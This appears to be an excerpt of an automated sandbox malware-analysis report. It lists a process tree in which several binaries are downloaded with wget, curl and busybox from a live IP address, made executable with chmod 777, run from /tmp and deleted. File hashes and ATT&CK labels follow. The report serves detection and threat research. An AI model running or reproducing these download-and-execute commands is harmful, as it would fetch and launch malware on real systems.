  - /usr/bin/curl: curl -O http://216.126.231.240/bins/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz (PID 973) [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz (PID 974)
  - /bin/chmod: chmod 777 xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz (PID 975) [File and Directory Permissions Modification]
  - /tmp/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz: ./xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz (PID 976) [Executes dropped EXE]
  - /bin/rm: rm xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz (PID 977)
  - /usr/bin/wget: wget http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU (PID 978)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU (PID 979) [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU (PID 980)
  - /bin/chmod: chmod 777 MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU (PID 981) [File and Directory Permissions Modification]
  - /tmp/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU: ./MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU (PID 982) [Executes dropped EXE]
  - /bin/rm: rm MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU (PID 983)
  - /usr/bin/wget: wget http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1 (PID 984)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1 (PID 985) [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1 (PID 986)
  - /bin/chmod: chmod 777 QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1 (PID 987) [File and Directory Permissions Modification]
  - /tmp/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1: ./QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1 (PID 988) [Executes dropped EXE]
  - /bin/rm: rm QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1 (PID 989)
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 141KB
  MD5: 3ca8decdb1e52c423c521bfff02ac200
  SHA1: 8621ecd6807109b8541912ad9e134f6fb49bfd48
  SHA256: dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f
  SHA512: b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a
- Filesize: 153B
  MD5: 998368d7c95ea4293237f2320546e440
  SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
  SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
  SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97